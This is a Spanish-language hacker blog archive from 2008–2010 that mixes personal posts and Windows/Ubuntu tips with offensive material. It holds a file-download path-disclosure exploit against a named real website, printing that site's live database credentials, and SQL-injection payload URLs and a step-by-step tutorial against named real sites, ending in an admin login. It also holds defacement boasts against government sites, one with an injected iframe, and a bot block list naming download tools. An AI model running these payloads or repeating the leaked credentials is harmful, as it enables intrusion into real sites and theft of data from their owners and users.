- Envia a /PATH/TUPAGINA.HTML, si se presentara un error404.
Tambien puede ser utilizado para adoptar otros erores. - 403 y otros -

-----------------------------

=> Bloqueo de referers maliciosos :

RewriteEngine on
RewriteCond %{HTTP_REFERER} pornoduro\.com [NC,OR]
RewriteCond %{HTTP_REFERER} sexoydrogas\.com
RewriteRule .* - [F]

- Se niega el acceso a - Pornoduro.com y sexoydrogas.com.
para evitar robo de ancho de banda.

-----------------------------

=> Bloqueo de ROBOTS :

En algunos casos queremos bloquear los robots esos que te joden el existir.
Eh aqui la solucion ah esos dolores de cabeza, aunque aveces se ponen cagones.

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:diosdelared@ddlr.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule .* - [F]

-----------------------------

=> Cambiar extencion de archivos :

# Make PHP code look like unknown types
AddType application/x-httpd-php .b3x

- Con esto lograremos que nuestro archivos *.b3x queden como *.php :)
asi en cierta forma quedara oculta la verdadera extencion de nuestros archivos.

-----------------------------

=> Eliminar error 500 :

AddDefaultCharset utf-8

- Este no lo recuerdo muy bien. Creo que es asi :)

-----------------------------

=> Mas informacion :

Click aqui, para mas info.
-----------------------------

=> Greets.

=> Bikolinux - n350k - gab0 - x0ptik - murdeR
Mastervip - Mteam - Diosdelared - zer0max
zer0z0rg - Ccrew[Cereal] - kaoS! - Muertedigital.

... Y los que faltan.

Fin de semana en Merida

2010-01-18T19:09:00.000-08:00

Este fin de semana que paso me escape a merida a distraerme del trabajo y demas preocupaciones que me estaban causando demaciado estres. aqui les dejo unas fotos para que vean que lindo es mi merida :p
Mi linda merida:

Servidor en Linux Ubuntu Server – ( Manual completo )

2010-01-13T20:50:00.000-08:00

Bueno me ahorrare la parte de la instalacion ya que aqui esta
http://www.forat.info/2008/08/12/servidor-en-linux-ubuntu-server-manual-completo/
ok, ya tenemos instalado nuestro servidor pero no queremos usar el no-ip que viene en el manual y tenemos nuestro propio dominio
les mostrare muy facil como lo tengo :p,

1.- hacer una cuenta free de DNS en cdmon. ( yo lo uso)
2.-agregar el dominio y te pedira que pongas la ip del server (el tuyo claro esta )
3.- entramos a nuestro server por ssh y nos vamos a cd /etc/apache2/sites-available una vez dentro encontraremos un archivo llamado default
lo abrimos con nano: nano default. y nos arrojara lo siguiente:

NameVirtualHost *

       ServerAdmin email@dominio.com

       DocumentRoot /var/www/
       
               Options FollowSymLinks
               AllowOverride None
       
       
               Options Indexes FollowSymLinks MultiViews
               AllowOverride None
               Order allow,deny
               allow from all
       

       ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
       
               AllowOverride None
               Order allow,deny
               allow from all
       

       ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
       
               AllowOverride None
               Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
               Order allow,deny
               Allow from all
       

       ErrorLog /var/log/apache2/error.log

       # Possible values include: debug, info, notice, warn, error, crit,
       # alert, emerg.
       LogLevel warn
y mas......ahora agregamos ServerName www.dominio.com abajo de  DocumentRoot /var/www/

quedando de la siguiente manera

DocumentRoot /var/www/
ServerName www.dominio.com

ahora reiniciamos apache con /etc/init.d/apache2 restart
y ahora ya podran entrar a su servidor con su propio dominio;

si quieren agregar mas dominios solo tienen que copiar todo el desmadrito que trae el archivo default hacia abajo y cambiando :
DocumentRoot y Server Name y listo xDD
se aceptan criticas.

aclaro este texto esta escrito bajo experiencia xD investigando y bla bla bla :p

The BlackList By Zer0 Z0org

2010-01-12T21:36:00.000-08:00

Clic Para ver mas grande :p

Aqui les traigo la BlackList segun Zer0 xDD buen wallpaper? xd pero el culo no se puso xDDD en fin puro emo de la red xDD buena zer0 ahi nos vemos pronto para echar las lagrimas xD digo chelas xD muajajajaja

Crackear claves wep

2010-01-09T17:45:00.000-08:00

Bueno aca pongo un videotutorial un poco extenso de como crackear claves wep creado por Oscar Rovira.
Crackear claves wep = hackear claves de inalambricos

EPICA - Unleashed

2010-01-09T17:11:00.000-08:00

Bueno Aqui les traigo el Nuevo video de Epica titulado Unleashed, es una buena rola de esta banda holandesa; simone simons i love you xD hahahaha

Problemas con password en hojas de excel?

2010-01-08T12:46:00.000-08:00

Bueno no se si algunos les ah pasado esto como a mi camarada zer0 z0orgsobre este tema aqui comenta su experiencia y soluciones :p

Bueno pues me surgio est problemin, de que olvide la pass de una hoja de excel y pues pense
mergas y ahora quien podra defenderme? xDDD y en eso aparecio el chapulin googlorado.

jaja ya pues en mi super, duper, mega busqueda vi muchos programas que "crackeaban", y "recuperaban la pass", pero todo tiene un precio en esta ciber vida, shiale que mamds no?

En fin uno que es pobre, humilde y honrado pues a segir buscando pero alguno que sea gratuito
hasta que un alma se apiado de la pobreza ajena y en un blog me encontre con un programma llamado Excel Password Recovery con keygen y regalito y toda la cosa jaja nel no cierto esta limpio.

Y lo pruebo y nada que no anda con las hojas de excel del 2007, no pues le digo ami carnal el gothic que si tiene alguna version vieja , no que si que la 2003 ya pues le digo que me role una hoja con pass y ya pues la pongo en el programin y voala "crackeo" la contrase?a que ami parecer lo que hace es modificarla pero sabra la merga xDD.

Pero la hoja que yo queria crackear o recuperar el pass era con el office 2007 asi que el problema seguia xD.

Hasta que mi carnalillo el gothic me dice y para que querias esa madre, le platico el problema y me dice pues abrelo con el open office y yo no mams y ese que pedo recupera la contrase?a o que (todo bobo yo que no sabia que era el open office xD) y ya lo bajo, lo instalo y me quedo de a 6 ya que ni siquiera pedia la pass xD.

Asi que la conclusion:

Versiones viejas: Excel Password Recovery
Descarga:
http://rapidshare.com/files/231837817/Excel_password_recovery_www.zer0-z0org.com.zip

Actual: Open Office
Descarga:
http://openoffice.bouncer.osuosl.org/?product=OpenOffice.org&os=win&lang=es&version=3.1.0

PD: Para los que tienen dinero sea suyo o ajeno, aqui pueden crackear o recuperar la pass, comprando el producto.

https://www.cleverbridge.com/

Mis pi?Aventuras xD
Saludos, Zer0 z0orG

Explotando Full Source Diclosure Bugueando "force-download.php"

2009-10-29T15:39:00.000-07:00

Leyendo un post de zeus en ddlr sobre esto me puse a googlear y encontre este script que es vulnerable al path dicluser force-download.php que te deja bajar hasta los chescos del server.

simplemente tenemos la web:

http://www.xxx.xx.xx/force-download.php?file=archivo.pdf
cambiamos el archivo.pdf por "force-download.php" para comprobar que es vulnerable. si te da a descargar proseguimos a bajar el index.php

http://www.xxx.xx.xx/force-download.php?file=index.php y sacaremos muchos mas datos. como el config.php entre otros
para prueba un boton:

http://www.expo2010chile.cl/force-download.php?file=force-download.php juaz baja,
http://www.expo2010chile.cl/force-download.php?file=index.php era de esperarce Grin
en este caso sacamos esto:
Código:

/** Loads the WordPress Environment and Template */
require('./wp2/wp-blog-header.php')

http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-blog-header.php
de este:
Código:

require_once( dirname(__FILE__) . '/wp-load.php' );

http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-load.php

Código:

/** The config file resides in ABSPATH */
require_once( ABSPATH . 'wp-config.php' );

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2_expo2010chile');

/** MySQL database username */
define('DB_USER', 'wp2_eXpoCh1le');

/** MySQL database password */
define('DB_PASSWORD', 'wUyUBaTEphac8UG');

/** MySQL hostname */
define('DB_HOST', 'localhost');

y simplemente desde una php-shellentramos por el SQL y entramos directo a la db =D
happy hacking

dork: "allinurl: "force-download.php?file= .pdf""

La Seguridad en Algunos servidores.

2009-09-29T18:11:00.000-07:00

Es triste encontrar este tipo de seguridad en servidores como este. que ah muchos les hacen creer que son los mas seguros de la red, cuando no es asi. aqui les dejo unos screens de uno que me encontre que tieme mas de 30 sitios a su merced...
nota: no son todos los dominios....

Bug en web desarrolladora SUSTAM.COM

2009-09-18T23:14:00.000-07:00

ahi haciendo un poco de pen-testing encontre una web con SQLi aqui les dejo la info

++++++++++++++++++++++++++++++++++++++++++++++++++++
web desarrolladora: SUSTAM.COM

Bug: SQLi

****************************************************
tabla:
administradores

****************************************************
columnas:

usuarios

clave
****************************************************
inyection:

-1+union+select+0,1,2,concat(usuario,0x3a,clave),4,5,6,7,8,9,10,11,12,13+from+administradores--

dato: varian los numeros de tablas en las webs, la vulnerable con mas frecuencia es la 3
*****************************************************
panel:

/admin
*****************************************************
DNSreverse:

http://www.ip-adress.com/reverse_ip/sustam.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

server info:
Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8. PHP/4.4.7 Kernel: Linux sustam02.sustam.com 2.6.18-128.2.1.el5PAE #1 SMP Tue Jul 14 07:15:01 EDT 2009 i686

Tutorial Ijection SQL

2009-06-15T17:23:00.000-07:00

##########################################################################################
## TUTORIAL INJECTION SQL By Gothic-X ##
## ##
## Greetz: Version 1.1 ##
## || Zer0-z0oRg || Zues || Kaos || Dont.Cool || Murder || Knet || Fr34k || ##
## ##
## www.undermx.blogspot.com ##
## ##
## ##
## ##
##########################################################################################

WEB: http://directinformatica.es/
METODO DE ATAQUE: SQL INJECTION

Bueno empesaremos con buscar la parte de la web donde es vulnerable en este caso sera en
http://directinformatica.es/detalle.php?id= verificamos si es vulnerable haciendo una
consulta con solo ponerle ( ' ) una coma.
efectivamente este sitio es vulnerable a sql, como savemos? por que nos arrojo un mensaje de
error el cual es el siguiente.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gedraqxj/public_html/detalle.php on line 35

el cual nos indica que es vulnerable. bueno agora buscaremos cuantas columnas tiene el sitio agregando
lo siguiente al fina de la url de la web ( detalle.php?id=-1+union+select+0,1,2,3,4,..., en este caso tiene
9 columnas osea quedaria de la siguienteforma.

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,8--

entrando veremos que nos arrojo unos numeritos en la web en este caso fueron : 8 , 4 , 2 .

ya estando aqui veremos si la web tiene information schema de manera que quede de esta forma:
agregando al final +from+information_schema.tables-- y reemplazando cualquiera de los numeros
nos arrojo la web por table_name quedando la url de la aiguiente manera;

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema--

perfecto nos arrojo un texto CHARACTER_SETS el cual es una tabla y con eso confirmamos que tiene
information schema, ahora buscaremos la tabla de usuario, usuarios o admin agregando al final
+limit+1,1-- y quedaria de esta forma:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+1,1--

ahora para que encontremos la tabla deseada avansaremos en el primer uno del limit de la siguiente manera. +limit+2,1--
hasta ncontrar la tabla deseada. en esta web se tubo que avansar 20 para la tabla deseada y quedo de la siguiente manera
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+20,1--
y nos dio como resultado: adm_usuario
ahora como ver lo que esta dentro de la tabla, osea ver las columnas, bueno primero convertiremos la tabla a hexadecimal
usualmente uso esta herramienta http://hwagm.elhacker.net/php/sneak.php, bueno nos dio como resultado: 61646d5f7573756172696f
bueno al final de la url de la injection aditaremos el final reemplazando .tables+limit+20+1-- por columns+where(table_name=0xaquitabalaenhex)-- y
donde tenemos table_name lo reemplazamos por column_name y nos quedaria de la siguiente manera.
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,column_name+from+information_schema.columns+where(table_name=0x61646d5f7573756172696f)--
y vemos que nos arroja las columnas y para ir encontrando las columnas deseadas avansamos con +limit+1,1-- cambiando el 1 por 2 y asi susesivamente
hasta encontrar las columnas deseadas.
en esta web encontramos las siguientes columnas:
id_user, id_tipo, nomb_user , nick_user , pass_user , acti_user
bien ya con esas tenemos las esenciales que son nomb_user y pass_user.
ahora como vemos dentro de las columnas? bueno solo reemplazamos el fina despues de +from+ y agregamos el nombre de la tabla que es
adm_usuario y donde tenemos column_name reemplazamos por concat(columna,0x3a,columna) el 0x3a esta en hexadecimal y es ( : ), entonces
nos quedaria de la siguiente manera nuestra url:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,concat(nick_user,0x3a,pass_user)+from+adm_usuario--
y nos arrojara nuestra informacion deseada que es la siguiente: admin:matias1
ahora solo nos falta encontrar el admin panel, en la siguiente web es http://directinformatica.es/cms/
y nos logeamos y hacemos lo que tengamos que hacer.

THE END.

http://www.santaclara.gob.mx/ Owned

2009-06-12T10:17:00.000-07:00

Bueno aqui seguimos demostrando la inseguridad del Gobierno de mexico.
un Owned mas al Gobierno.
Web: H. Ayuntamiento de Salvador Escalante
Url: http://www.santaclara.gob.mx/
Mirror: http://www.zone-h.org/mirror/id/8982580
Tipo de ataque: Sql Inyection.
screen:

dicadeteatro.com.br Owned

2009-06-11T15:29:00.000-07:00

bueno aqui les dejo una web mas owneada x mi amm metodo sql inyecction
ahi nada mas le agregue un pequeño iframe xD lolazo yo y en fin espero que les guste
http://dicadeteatro.com.br/

MiniMetraje Minimalista

2009-06-01T12:03:00.001-07:00

Navegando sobre los blogs de los amigos informaticos encontre en Èter Blog un post algo especial.
este es un minimetraje que es? bueno aqui se los dejo para que lo vean y digan que ven.

http://eterblog.com/2009/05/21/videos/minimetraje-minimalista/

opinen y observen con mucho cuidado. :p

Saludos a Oscar Rovira creador del minimitraje

Ayer pedi que te murieras - Victor Garcia

2009-06-01T10:00:00.000-07:00

Pues sin nada mas que decir...

AYER PEDI QUE TE MURIERAS
QUE TE CARGARA LA TRISTEZA
QUE TODO EL MUNDO TE OLVIDARA
QUE TU BELLEZA SE ACABARA
PARA QUE NADIE TE QUISIERA

AYER PEDI CON TANTA FUERZA
QUE TODO EL MAL QUE HAY EN LA TIERRA
SOBRE LA ESPALDA TE CAYERA
PARA QUE YO LO DISFRUTARA
PARA QUE TU LO PADECIERAS

--CORO--
AYER PEDI QUE TE MURIERAS
POR QUE TE ODIO DE ADEVERAS
PERO ESTE IDIOTA CORAZON
QUE ES MUCHO MAS FUERTE QUE YO
TAMBIEN ME OBLIGA A QUE TE QUIERA.

ESTOY A PUNTO DE VOLVERME LOCO
POR QUE TE AMO COMO A NADIE
POR QUE JAMAS PODRE ARRANCARME TUS CARICIAS DE MI PIEL

ESTOY A PUNTO DE VOLVERME LOCO POR QUE JAMAS VOY A OLVIDARTE POR QUE TENDRE QUE ACOSTUMBRARME A VIVIR AMANDOTE, ALGUNA CULPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINE.

AYER PEDI CON TANTA FUERZA QUE TODO EL MAL QUE HAY EN LA TIERRA SOBRE LA ESPALDA TE CALLERA, PARA QUE YO LO DISFRUTARA PARA QUE TU LO PADECIERAS

AYER PEDI QUE TE MURIERAS POR QUE TE ODIO DE ADEVERASPERO ESTE IDIOTA CORAZON QUE ES MUCHO MAS FUERTE QUE YO TAMBIEN ME OBLIGA A QUE TE QUIERA.

ESTOY A PUNTO DE VOLVERME LOCO POR QUE TE AMO COMO A NADIE POR QUE JAMAS PODRE ARRANCARME TUS CARICIAS DE MI PIEL, ESTOY A PUNTO DE VOLVERME LOCO POR QUE JAMAS PODRE OLVIDARTE POR QUE TENDRE QUE CONSTUMBRARME A VIVR AMANDOTE, ALGUNA CUMPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINE.

ALGUNA CULPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINEEE

Y HOY SOLO QUIERO QUE TU VUELVAS.

Instituto Academico de Investigaciones y Capacitacion Electoral

2009-05-28T06:46:00.000-07:00

Web: Instituto Academico de Investigaciones y Capacitacion Electoral
Url: http://www.teem.gob.mx/tribunal/
Mirror: http://www.zone-h.org/mirror/id/8940122
Tipo de ataque: Sql Inyection.
screen:

ComboFix

2009-05-27T19:09:00.000-07:00

Bue.. no les ah pasado que derrepente no peuden entrar al admin de tareas o se les cierra el cmd o mamadas asi? bueno aqui la solucion.

Pequeña y potente herramienta, sirve para eliminar infecciones producidas por SurfSideKick, QooLogic, Vundo, Look2Me y la combinación de todo el grupo.

Además es puesta al día con bastante regularidad.

Modo De Uso:

1. Se descarga combofix.exe en una carpeta para ella propia.

2. Hacemos Doble clic en su ejecutable combofix.exe. Los iconos del Escritorio desaparecerán (esto es normal) y aparecerá el mensaje Performing a scan of your machine.

3. A continuación, se mostrará el mensaje Preparing a log report. This takes a while. So, please be patient.

4. Seguidamente, aparecerán los mensajes Almost done…. A report of Combofix’s actions would be produced at C:\Combofix.txt.

5. Espera a que la ventana del programa se cierre sola y nos muestre el archivo C:\Combofix.txt. Los iconos del Escritorio volverán a su sitio sin necesidad de tener que reiniciar el PC.

6.Ya tenemos el informe combofix.txt que nos mostrará los archivos detectados y eliminados relacionados con los Adware SurfSideKick, QooLogic y Look2Me3.

Importante:

Cuando se usa ComboFix hay que tener desactivado cualquier otra suit de seguridad

Es importante desinstalar y borrar cualquier rastro de ComboFix una vez realizada la limpieza, sigue los siguientes pasos:
Ve a Inicio -> Ejecutar -> Teclea o copia y pega el siguiente comando y pulsa Enter: ComboFix /u

Después de unos segundos aparecerá la ventana ComboFix is uninstalled.
En caso de no haber podido desinstalar ComboFix satisfactoriamente, elimina el ejecutable de la utilidad donde lo descargaste (normalmente en el Escritorio) y elimina también la carpeta ComboFix ubicada en la unidad C:\.

Para cualquier duda, pásate por el foro de seguridad informática y expongala, seguro le ayudaran.

Licencia: Freeware (Gratuita)
S.O.: Win 98/Me/2000/XP
Versión: 0.1

Descarga:

Descarga: BleepingComputer.com

Las 10 chicas mas guapas y geeks

2009-05-26T17:23:00.000-07:00

Ahora te traemos la lista de las 10 chicas mas guapas y Geeks que el sitio Askmen.com ha seleccionado por su trabajo y cercania con el mundo de la tecnologia…

1. Amber MacArthur - A trabajado para Microsoft y Razorfish

2. Morgan Webb - Podcast WebbAlert y presentadora del programa de videojuegos X-Play

3. Jessica Chobot - Famosa por una foto con una PSP, actualmente hace articulos sobre videojuegos

4. Olivia Munn - Presentadora de programas sobre nuevas tecnologias

5. Cali Lewis - Creadora de un portal dedicado a los podcast

6. Veronica Belmont - Algunos podcast

7. Amanda Congdon - Tiene su propio videoblog y presenta un popular podcast semanal

8. Kristin Holt - Presentadora y reportara tecnologica

9. Blair Butler - Guionista del programa de videojuegos X-Play

10. Wendy Cheng - Bloguera y participa en el videopodcasts para clicknetwork.tv

Hay que hacer nuestra propia lista no creen… propongo a la chica de Telurica y a la de Mobuzz Tv… quien propone mas???

El árbol de navidad más friki/geek

2009-05-26T17:10:00.000-07:00

Nuestros amigos Juan y Carolina, de Clipset.net han encontrado este curioso árbol de navidad situado al lado del Corte Inglés de Azca, en Madrid.

Y digo curioso ya que sus luces forman uno de los juegos más conocidos de todos los tiempos, el Pac-Man. Y nada mejor que ver a Carolina presentándolo:

Podrán haber árboles de navidad más bonitos, pero nunca más geeks que éste. Así que si algún madrileño pasa a verlo, que no dude en echarse una foto junto al árbol y enviárnosla.

GAP [GrupoAnti-Pedofilia]

2009-05-26T12:02:00.000-07:00

Bueno ahora viene este nuevo grupo con bastantes ganas de sacar la basura de la red

para dar batalla a esa gente enferma, sin cerebro, sin sentimientos.

Si tienes información, ya sea websites, emails, nombres, etc.
no dudes en adjuntarla en este post, mientras GAP crea el
sistema de Agregado de información anónima, para que te veas involucrado
al 0% por si tienes dudas, etc.

Apúntate y ayuda con información.

Si Deseas dejar informacion, simplemente dejala en un comentario! ó si quieres hacerlo de manera anonima, manda un email a gapconect@gmail.com

ATTE GAP

Dejando el "Fabricado y con soporte de" en win xp

2009-01-09T13:37:00.001-08:00

Bien eh visto que haveces los tecnicos que dan mantenimiento a cyber o pc personales
dejan una imagen en propiedades como la siguiente:

y me eh puesto a investigar =D, lo unico que hay que hacer es tener 3 pequeños archivos
y ponerlos en C:\windows\system32
lo unico que hay que editar es el archivo llamado oeminfo lo abren y editan
y cambiar el logo que trae " el mio " por el de ustedes
yo le tengo puesto una imagen com formato .bmp se sugiere usar ese mismo formato
y con medidadas de 100x100 px.
despues de ponerlos en system32 ejecutar el .bat que trae el archivo llamado RUTINAS (pueden ver el bat
para que no haya malos entendidos y digan que quiero joder sus pcs) Y listo ya pueden ir a las propiedades
de sistema para ver como quedo.

DESCARGA DE ARCHIVO:

http://rapidshare.com/files/181387572/soporte.rar

PD. no se rian de la velocidad de mi pc >.<
pd2: si tienen dudas posteen nomas y haver que solucion damos

Cambiando el boton de inicio a Ubuntu

2008-12-26T20:22:00.001-08:00

aqui lesd ejo este tuto echo por mi =D
bueno para cambiar el icono al boton de inicio primero hayq ue bajarce
este archivo. y descomprimimos
http://rapidshare.com/files/175615642/RemoteExecution.tar.gz

solo usaremos la que dice
22x22
24x24
48x48
scalable

dentro de ellas encontraran
places en todas las mencionadas arriba esta.
dentro de las 3 primeras hay un icono que se llama distributor-logo.png
en la ultima cambia la extencion a .svg pueden remplazar la que esta por otra
pero usen el mismo nombres y extenciones. el tamaño recomendado para la imagen
es de 24x24 no importa si lo meten ese tamaño en 22x22 y 48x48. lo comprimen de nuevo
en .tar.gz se van a sistemas--preferencias--themes o apariencia..
suben como theme nuevo si les sale un mensaje de usar nuevo theme diganq que si
y listo. se ah cambiado el icono que trae ubuntu =D

nota: no borren el comprimido de donde lo hayan instalado xD

si tienen dudas aqui o al msn

bytez Gothic-X

defaces by me

2008-12-22T13:14:00.000-08:00

web: http://bnv.gob.ve/index.php
Motivo: segundo deface de mi vida y aprendizaje
Screen:
http://img205.imageshack.us/img205/6859/imagen1gm2.png

___________________________________________________________________
web: http://ishared4.webcindario.com/
Motivo:aprendizaje
Screen:
http://img67.imageshack.us/img67/2071/pwnedzu0.png

http://www.noquierotrabajar.com/
screen:
http://img213.imageshack.us/img213/144/imagennh3.png

http://sandbox.noquieroprogramar.com/

http://img166.imageshack.us/img166/6558/imagen2su2.png

http://www.noquieroprogramar.com/
http://img367.imageshack.us/img367/8574/programarpf2.png

Owned http://www.zbjsj.gov.cn/

2008-10-19T14:23:00.000-07:00

Owned... C.I.C

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal

Y]ou Are [T]he mother [F]ucker

[G]reetz:[G]othic-x - [A]gent - [N]exus

http://r3d-point.com/ Defaced By 0o_zeus_o0

2008-10-17T13:33:00.000-07:00

0o_zeus_o0 : aun se defacear , aun defaceo a objetivos , esto es para callar un poko a la gente , 0o_zeus_o0 es papi

imagen por si dicen ke no es verdad

Pwned ????

yeahh you are pwned by 0o_zeus_o0

me costo el server , pero es para dejar ver que no solo soy un super defacer de google , tambien objetivos , tengan en cuenta que sigo siendo el mejor de todos no se me comparen porfavor no comentan errores.

greetz: a todos mis amigos en especial a mi novia :p

deface con deface se paga espero el mio

ALKON OWNED

2008-10-16T19:37:00.000-07:00

HACKED BY Knet, Ricota & Pollo!

link: www.alkon.com.ar

asi que muevan las cachas :P

Kcho Borracho NOT DEAD

KKR Again papi
100% Argentos!!

El mejor server de Argentina

donde ? yo no lo veo...

Vamos las Putas !!!

Atentamente los SR's:

KeyNet.Security@Hotmail.com
ricota.forever@Hotmail.com

Sobala pelotin no seas Forro

Owned Canal 11

2008-10-16T17:37:00.000-07:00

Owned by Karont3 & Red-Point

link: http://oncetv-ipn.net/dialogos/foro/listahijos.php?var=869

Karont3 & Red-Point Waz HEre!!

Ownz Ur System quiero salir de nuevo en las noticias ok? jajajajaja

tienen mas fallas de seguridad en el sitio con gusto les ayudare a arreglarlas

http://kar0nt3.co.cc/

http://r3d-point.com

METODO: HTML inyeccion

xD sin duda a red point no le basto con una entrevista, canal 11 R3d P0int puede
arreglar tantos bugs de su website
Saludos a :
R3d P0int..

Cambiar el nombre al boton inicio "xp Profecional"

2008-10-16T12:32:00.000-07:00

Lo primero que tenemos que hacer es bajar el programa para poder cambiar el boton de inicio, el programa se llama Reshack.

DESCARGAR Reshack

Abrimos el Reshack y le ponemos File/open, despues le saldra otro cuadro y donde dice buscar en: se van a disco c y despues a la carpeta que dice windows, ahora donde dice nombre pondremos explorer.exe. y le ponen abir ejemplo:

le saldra un cuadro le ponen donde dice string table ejemplo.

Despues le saldra muchos numeros le dan clic al 37 y le saldra un archivo que dice 3082 y le dan clic le saldra esto.

ahora amigos le cambiaremos donde dice inicio como ustedes quiera que aparesca en su boton de inicio. ejemplo.

bueno aqui si le cambiare el inicio, aqui ponen lo que ustedes quieran que le aparesca en su boton de inicio yo le pondre LIR. despues de poner en donde estava inicio le dan clic a Compile Script. ejemplo:

